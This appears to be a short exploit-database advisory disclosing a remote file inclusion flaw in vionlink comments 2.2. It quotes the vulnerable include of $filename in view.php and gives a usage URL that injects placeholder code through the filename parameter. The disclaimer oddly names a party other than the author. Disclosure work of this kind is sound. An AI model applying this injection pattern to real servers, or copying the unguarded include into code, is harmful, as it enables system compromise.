Vionlink comments 2.2 Remote File Include Vulnerability

# Exploit-Title: vionlink comments 2.2 Remote File Include Vulnerability
# Date: 2014-05-06
# Author: bd0rk
# Software-Link: http://www.vionlink.de/downloadcounter.php?version=v_comments2.2
# Affected-Version: 2.2
# G00gle-D0rK: n/a --->script-kiddieprotected
# Tested on: Ubuntu-Linux 14.04 LTS
# Contact: twitter.com/bd0rk

Sh0rT-Description:

I found vulnerable php-sourcecode in directory /vionlink.comments/view.php
--------------------------------------------------------------------------
In-Line 29-30:  if(is_array($data)){extract($data);}
             
        @include $filename; echo cright;
--------------------------------------------------------------------------

So an attacker can inject some php-shellcode about the parameter $filename.

Access-Possibilities: Compromise the system for example!

[+]Usage: http://[host]/vionlink.comments/view.php?filename=[EVILCODE]



### The 25 years old german Hacker bd0rk ###


//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information